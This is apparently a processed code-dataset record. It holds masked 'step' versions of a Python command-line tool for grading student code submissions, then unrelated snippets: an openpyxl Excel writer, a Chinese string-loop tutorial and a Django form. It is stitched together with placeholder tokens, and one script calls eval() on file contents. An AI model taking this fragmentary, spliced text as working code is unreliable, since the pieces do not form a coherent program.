{Style.RESET_ALL}{line}')\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(Fore.MAGENTA + ' ' * indent_level + '# ' +\n accepted_comment.comment)\n if curr_comment and line_num == curr_comment.line_num:\n print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' +\n curr_comment.comment)\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': 
field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\"\"\n\ncancel = cancel this comment\nclear = clear all question comments\nreset = reset all student comments\n? 
{Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\"\"\n )\n raise Interrupt(inp)\n\n\n<mask token>\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! 
{Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_code_with_accepted_and_potential_comments(name, problem,\n accepted_comments, curr_comment=None):\n clear()\n print(f'Problem: {name}')\n highlighted_code = highlight(problem.code, PythonLexer(),\n TerminalFormatter())\n for i, line in enumerate(highlighted_code.split('\\n')):\n line_num = problem.initial_line_number + i\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n print()\n print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}')\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(Fore.MAGENTA + ' ' * indent_level + '# ' +\n accepted_comment.comment)\n if curr_comment and line_num == 
curr_comment.line_num:\n print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' +\n curr_comment.comment)\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\"\"\n\ncancel = cancel this comment\nclear = clear all question comments\nreset = reset all student comments\n? 
{Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\"\"\n )\n raise Interrupt(inp)\n\n\ndef main():\n readline.parse_and_bind('tab: complete')\n readline.set_completer_delims('')\n print('cli.py main')\n for id in get_backup_ids():\n try:\n code = get_backup_code(id)\n problems = get_problems(code)\n except Exception:\n print(\n f'{Fore.RED}An exception occurred while processing backup id #{id}'\n , file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n print(f'{Style.RESET_ALL}')\n continue\n grade = grade_backup(problems)\n for comment in grade.comments:\n print(comment)\n assert not comment.fields, 'fields not substituted!'\n submit_comment(id, comment.line_num, comment.comment)\n submit_grade(id, grade.score, grade.message)\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? 
{Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\n<mask token>\n", "step-4": "<mask token>\nparser.add_argument('proj', help=\n \"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\"\n )\n<mask token>\nparser.add_argument('proj', help=\n \"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\"\n )\n<mask token>\n\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_code_with_accepted_and_potential_comments(name, problem,\n accepted_comments, curr_comment=None):\n clear()\n print(f'Problem: {name}')\n highlighted_code = highlight(problem.code, PythonLexer(),\n TerminalFormatter())\n for i, 
line in enumerate(highlighted_code.split('\\n')):\n line_num = problem.initial_line_number + i\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n print()\n print(f'{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}')\n if (line_num in accepted_comments or curr_comment and line_num ==\n curr_comment.line_num):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(Fore.MAGENTA + ' ' * indent_level + '# ' +\n accepted_comment.comment)\n if curr_comment and line_num == curr_comment.line_num:\n print(Fore.RED + Style.BRIGHT + ' ' * indent_level + '# ' +\n curr_comment.comment)\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print('Please provide supplementary information:')\n field_vals = {}\n for field in comment.fields:\n q = {'type': 'input', 'name': 'field', 'message': field + ':'}\n response = wrapped_prompt(q)\n field_vals[field] = response['field']\n complete_text = comment.comment.format(**field_vals)\n q = {'type': 'input', 'name': 'final', 'message': 'Final message',\n 'default': complete_text}\n response = wrapped_prompt(q)\n return Comment(comment.line_num, response['final'])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\"\"\n\ncancel = cancel this comment\nclear = clear all question comments\nreset = reset all student comments\n? 
{Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\"\"\n )\n raise Interrupt(inp)\n\n\ndef main():\n readline.parse_and_bind('tab: complete')\n readline.set_completer_delims('')\n print('cli.py main')\n for id in get_backup_ids():\n try:\n code = get_backup_code(id)\n problems = get_problems(code)\n except Exception:\n print(\n f'{Fore.RED}An exception occurred while processing backup id #{id}'\n , file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n print(f'{Style.RESET_ALL}')\n continue\n grade = grade_backup(problems)\n for comment in grade.comments:\n print(comment)\n assert not comment.fields, 'fields not substituted!'\n submit_comment(id, comment.line_num, comment.comment)\n submit_grade(id, grade.score, grade.message)\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Does this grade look reasonable?'}\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == 'reset':\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments, comment)\n print(f'{Fore.CYAN}Potential comment: {Style.RESET_ALL}')\n print(\n f'{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}'\n )\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Add comment', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n while True:\n try:\n display_code_with_accepted_and_potential_comments(name,\n problem, accepted_comments)\n response = wrapped_input(\n f'? 
{Style.BRIGHT} Custom comment type: {Style.RESET_ALL}')\n if not response:\n q = {'type': 'confirm', 'name': 'ok', 'message':\n 'Go to next question?', 'default': True}\n response = wrapped_prompt(q)\n if response['ok']:\n break\n continue\n if response not in templates:\n print(\n f'{Fore.RED} Template {response} not found! {Style.RESET_ALL}'\n )\n continue\n text = templates[response]\n q = {'type': 'input', 'name': 'line_num', 'message':\n 'Line number:'}\n response = wrapped_prompt(q)\n try:\n line_num = int(response['line_num'])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! {Style.RESET_ALL}\"\n )\n continue\n if text:\n fields = list(set(re.findall('{(.*?)}', text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {'type': 'input', 'name': 'text', 'message': 'Comment:'\n }\n response = wrapped_prompt(q)\n comment = Comment(line_num, response['text'], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == 'cancel':\n continue\n raise\n print()\n return list(sum(accepted_comments.values(), []))\n except Interrupt as e:\n if e.cmd == 'clear':\n return grade_problem(name, problem)\n raise\n\n\nif __name__ == '__main__':\n try:\n main()\n except:\n print(f'{Style.RESET_ALL}')\n", "step-5": "import os\nimport re\nimport sys\nimport traceback\nimport readline\nfrom typing import NamedTuple, List\n\nfrom PyInquirer import prompt\nfrom pygments import highlight\nfrom pygments.formatters.terminal import TerminalFormatter\nfrom pygments.lexers.python import PythonLexer\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Enter project endpoint')\nparser.add_argument(\"proj\", help=\"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\")\nargs = parser.parse_args()\nproj = args.proj\n\nfrom analyzer import get_problems, Comment\nfrom finalizing import grade\nfrom 
ok_interface import get_backup_ids, get_backup_code, submit_comment, submit_grade\nfrom colorama import Fore, Style\n\nfrom templates import template_completer, templates\n\nimport argparse\nimport config\n\nparser = argparse.ArgumentParser(description='Enter project endpoint')\nparser.add_argument(\"proj\", help=\"Run 'python3 cli.py <proj>', where <proj> is one of the following: hog cats ants scheme\")\nargs = parser.parse_args()\nconfig.proj = args.proj\n\nclass Grade(NamedTuple):\n score: int\n message: str\n comments: List[Comment]\n\n\ndef clear():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n\n\ndef display_code_with_accepted_and_potential_comments(\n name, problem, accepted_comments, curr_comment=None\n):\n clear()\n print(f\"Problem: {name}\")\n highlighted_code = highlight(problem.code, PythonLexer(), TerminalFormatter())\n for i, line in enumerate(highlighted_code.split(\"\\n\")):\n line_num = problem.initial_line_number + i\n if line_num in accepted_comments or (\n curr_comment and line_num == curr_comment.line_num\n ):\n print()\n print(f\"{Fore.GREEN}{line_num} {Style.RESET_ALL}{line}\")\n if line_num in accepted_comments or (\n curr_comment and line_num == curr_comment.line_num\n ):\n indent_level = len(line) - len(line.strip()) + 3\n if line_num in accepted_comments:\n for accepted_comment in accepted_comments[line_num]:\n print(\n Fore.MAGENTA\n + \" \" * indent_level\n + \"# \"\n + accepted_comment.comment\n )\n if curr_comment and line_num == curr_comment.line_num:\n print(\n Fore.RED\n + Style.BRIGHT\n + \" \" * indent_level\n + \"# \"\n + curr_comment.comment\n )\n print()\n print()\n\n\ndef complete(comment):\n if comment.fields:\n print(\"Please provide supplementary information:\")\n field_vals = {}\n for field in comment.fields:\n q = {\"type\": \"input\", \"name\": \"field\", \"message\": field + \":\"}\n response = wrapped_prompt(q)\n field_vals[field] = response[\"field\"]\n\n complete_text = 
comment.comment.format(**field_vals)\n q = {\n \"type\": \"input\",\n \"name\": \"final\",\n \"message\": \"Final message\",\n \"default\": complete_text,\n }\n response = wrapped_prompt(q)\n\n return Comment(comment.line_num, response[\"final\"])\n\n\ndef add_comment(accepted_comments, new_comment):\n if not new_comment:\n return\n if new_comment.line_num not in accepted_comments:\n accepted_comments[new_comment.line_num] = []\n accepted_comments[new_comment.line_num].append(new_comment)\n\n\nclass Interrupt(Exception):\n def __init__(self, cmd):\n super()\n self.cmd = cmd\n\n\ndef wrapped_prompt(q):\n ret = prompt([q])\n if not ret:\n receive_command()\n return ret\n\n\ndef wrapped_input(q):\n try:\n ret = input(q)\n except KeyboardInterrupt:\n return receive_command()\n return ret\n\n\ndef receive_command():\n inp = input(\n f\"\\n\\n\"\n f\"cancel = cancel this comment\\n\"\n f\"clear = clear all question comments\\n\"\n f\"reset = reset all student comments\\n\"\n f\"? {Style.BRIGHT}{Fore.RED}command: {Style.RESET_ALL}\"\n )\n raise Interrupt(inp)\n\n\ndef main():\n\n \n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer_delims(\"\")\n print(\"cli.py main\")\n for id in get_backup_ids():\n try:\n code = get_backup_code(id)\n problems = get_problems(code)\n except Exception:\n print(\n f\"{Fore.RED}An exception occurred while processing backup id #{id}\",\n file=sys.stderr,\n )\n traceback.print_exc(file=sys.stderr)\n print(f\"{Style.RESET_ALL}\")\n continue\n\n grade = grade_backup(problems)\n for comment in grade.comments:\n print(comment)\n assert not comment.fields, \"fields not substituted!\"\n submit_comment(id, comment.line_num, comment.comment)\n submit_grade(id, grade.score, grade.message)\n\n\ndef grade_backup(problems):\n comments = []\n try:\n for name, problem in problems.items():\n comments.extend(grade_problem(name, problem))\n score, message = grade(comments)\n print(message)\n q = {\n \"type\": \"confirm\",\n \"name\": 
\"ok\",\n \"message\": \"Does this grade look reasonable?\",\n }\n response = wrapped_prompt(q)\n return Grade(score, message, comments)\n except Interrupt as e:\n if e.cmd == \"reset\":\n return grade_backup(problems)\n raise\n\n\ndef grade_problem(name, problem):\n readline.set_completer(template_completer(name))\n\n try:\n accepted_comments = {}\n for comment in problem.comments:\n try:\n display_code_with_accepted_and_potential_comments(\n name, problem, accepted_comments, comment\n )\n print(f\"{Fore.CYAN}Potential comment: {Style.RESET_ALL}\")\n print(\n f\"{Fore.GREEN}{comment.line_num}{Style.RESET_ALL} {comment.comment}\"\n )\n q = {\n \"type\": \"confirm\",\n \"name\": \"ok\",\n \"message\": \"Add comment\",\n \"default\": True,\n }\n response = wrapped_prompt(q)\n if response[\"ok\"]:\n add_comment(accepted_comments, complete(comment))\n except Interrupt as e:\n if e.cmd == \"cancel\":\n continue\n raise\n\n while True:\n try:\n display_code_with_accepted_and_potential_comments(\n name, problem, accepted_comments\n )\n response = wrapped_input(\n f\"? {Style.BRIGHT} Custom comment type: {Style.RESET_ALL}\"\n )\n if not response:\n q = {\n \"type\": \"confirm\",\n \"name\": \"ok\",\n \"message\": \"Go to next question?\",\n \"default\": True,\n }\n response = wrapped_prompt(q)\n if response[\"ok\"]:\n break\n continue\n if response not in templates:\n print(\n f\"{Fore.RED} Template {response} not found! {Style.RESET_ALL}\"\n )\n continue\n text = templates[response]\n q = {\"type\": \"input\", \"name\": \"line_num\", \"message\": \"Line number:\"}\n response = wrapped_prompt(q)\n try:\n line_num = int(response[\"line_num\"])\n except ValueError:\n print(\n f\"{Fore.RED} Expected a number, received {response['line_num']} not found! 
{Style.RESET_ALL}\"\n )\n continue\n\n if text:\n fields = list(set(re.findall(r\"{(.*?)}\", text)))\n comment = Comment(line_num, text, fields)\n add_comment(accepted_comments, complete(comment))\n else:\n q = {\"type\": \"input\", \"name\": \"text\", \"message\": \"Comment:\"}\n response = wrapped_prompt(q)\n comment = Comment(line_num, response[\"text\"], [])\n add_comment(accepted_comments, comment)\n except Interrupt as e:\n if e.cmd == \"cancel\":\n continue\n raise\n print()\n\n return list(sum(accepted_comments.values(), []))\n\n except Interrupt as e:\n if e.cmd == \"clear\":\n return grade_problem(name, problem)\n raise\n\n\nif __name__ == \"__main__\":\n try:\n\n main()\n except:\n print(f\"{Style.RESET_ALL}\")\n", "step-ids": [ 9, 12, 13, 14, 17 ] }
[ 9, 12, 13, 14, 17 ]
<|reserved_special_token_0|> def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() word = eval(content) for i, j in zip(word.keys(), word.values()): words.append([i, j]) print(words) return words def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() word = eval(content) for i, j in zip(word.keys(), word.values()): words.append([i, j]) print(words) return words def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') if __name__ == '__main__': write_list(read_file()) <|reserved_special_token_1|> import openpyxl <|reserved_special_token_0|> def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() word = eval(content) for i, j in zip(word.keys(), word.values()): words.append([i, j]) print(words) return words def write_list(list): wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print('写入数据成功!') if __name__ == '__main__': 
write_list(read_file()) <|reserved_special_token_1|> import openpyxl # 适用于xlsx文件 ''' 纯文本文件 student.txt为学生信息, 里面的内容(包括花括号)如下所示: { "1":["张三",150,120,100], "2":["李四",90,99,95], "3":["王五",60,66,68] } 请将上述内容写到 student.xls 文件中 ''' def read_file(): words = [] with open('15.txt', 'r') as file: content = file.read() # print(content) # print(type(content)) word = eval(content) # print(word) # print(word.keys()) # for each in word.keys(): # print(each) # print(word[each]) # print(word.values()) # print(type(word)) for i, j in zip(word.keys(), word.values()): # print(i, j) words.append([i, j]) print(words) return words def write_list(list): # 写入excel文件 wb = openpyxl.Workbook() sheet = wb.active sheet.title = 'test' value = list for i in range(0, len(value)): for j in range(0, len(value[i])): sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j])) wb.save('city.xlsx') print("写入数据成功!") if __name__ == '__main__': # read_file() write_list(read_file())
flexible
{ "blob_id": "f75e0ddf42cc9797cdf1c4a4477e3d16441af740", "index": 5478, "step-1": "<mask token>\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n word = eval(content)\n for i, j in zip(word.keys(), word.values()):\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n word = eval(content)\n for i, j in zip(word.keys(), word.values()):\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\nif __name__ == '__main__':\n write_list(read_file())\n", "step-4": "import openpyxl\n<mask token>\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n word = eval(content)\n for i, j in zip(word.keys(), word.values()):\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i 
+ 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print('写入数据成功!')\n\n\nif __name__ == '__main__':\n write_list(read_file())\n", "step-5": "import openpyxl # 适用于xlsx文件\n'''\n纯文本文件 student.txt为学生信息, 里面的内容(包括花括号)如下所示:\n\n{\n\t\"1\":[\"张三\",150,120,100],\n\t\"2\":[\"李四\",90,99,95],\n\t\"3\":[\"王五\",60,66,68]\n}\n请将上述内容写到 student.xls 文件中\n'''\n\n\ndef read_file():\n words = []\n with open('15.txt', 'r') as file:\n content = file.read()\n # print(content)\n # print(type(content))\n\n word = eval(content)\n # print(word)\n # print(word.keys())\n # for each in word.keys():\n # print(each)\n # print(word[each])\n # print(word.values())\n # print(type(word))\n for i, j in zip(word.keys(), word.values()):\n # print(i, j)\n words.append([i, j])\n print(words)\n return words\n\n\ndef write_list(list): # 写入excel文件\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = 'test'\n value = list\n for i in range(0, len(value)):\n for j in range(0, len(value[i])):\n sheet.cell(row=i + 1, column=j + 1, value=str(value[i][j]))\n wb.save('city.xlsx')\n print(\"写入数据成功!\")\n\n\nif __name__ == '__main__':\n # read_file()\n write_list(read_file())\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# 遍历(循环) 出字符串中的每一个元素 str01 = "大发放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&" # ----->字符串中的元素都是有索引的,根据索引可以得到对应的元素 # 而---3 a = str01[3] print(str01[3]) # 发---1 print(str01[1]) #---->计算字符串的长度 # 这个字符串中 有 35个元素 ,长度是35 l01 = len(str01) print(l01) str01 = "大放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&" # 最后一个元素的索引:字符串的长度-1 len01 = len(str01)# 字符串的长度 index_last = len01 - 1 # 最后一个元素的索引 i = 0 # i变量表示是 元素的索引 while i <= index_last: print(str01[i]) i += 1 print() print("上面的循环结束了 执行到这里") ''' 0 1 2 ..... 34 '''
normal
{ "blob_id": "7262d7a82834b38762616a30d4eac38078e4b616", "index": 6724, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(str01[3])\nprint(str01[1])\n<mask token>\nprint(l01)\n<mask token>\nwhile i <= index_last:\n print(str01[i])\n i += 1\nprint()\nprint('上面的循环结束了 执行到这里')\n<mask token>\n", "step-3": "str01 = '大发放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&'\na = str01[3]\nprint(str01[3])\nprint(str01[1])\nl01 = len(str01)\nprint(l01)\nstr01 = '大放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&'\nlen01 = len(str01)\nindex_last = len01 - 1\ni = 0\nwhile i <= index_last:\n print(str01[i])\n i += 1\nprint()\nprint('上面的循环结束了 执行到这里')\n<mask token>\n", "step-4": "# 遍历(循环) 出字符串中的每一个元素\r\nstr01 = \"大发放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&\"\r\n\r\n\r\n# ----->字符串中的元素都是有索引的,根据索引可以得到对应的元素\r\n# 而---3\r\na = str01[3]\r\nprint(str01[3])\r\n\r\n# 发---1\r\nprint(str01[1])\r\n\r\n#---->计算字符串的长度\r\n# 这个字符串中 有 35个元素 ,长度是35\r\nl01 = len(str01)\r\nprint(l01)\r\n\r\n\r\n\r\nstr01 = \"大放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&\"\r\n# 最后一个元素的索引:字符串的长度-1\r\n\r\nlen01 = len(str01)# 字符串的长度\r\nindex_last = len01 - 1 # 最后一个元素的索引\r\ni = 0 # i变量表示是 元素的索引\r\n\r\nwhile i <= index_last:\r\n print(str01[i])\r\n i += 1\r\n\r\nprint()\r\nprint(\"上面的循环结束了 执行到这里\")\r\n\r\n\r\n'''\r\n 0 1 2 ..... 34\r\n \r\n\r\n'''\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from django import forms class TeacherForm(forms.Form): name = forms.CharField(label='Your Name', max_length=100, widget=forms. TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'})) email = forms.EmailField(widget=forms.TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'}))
normal
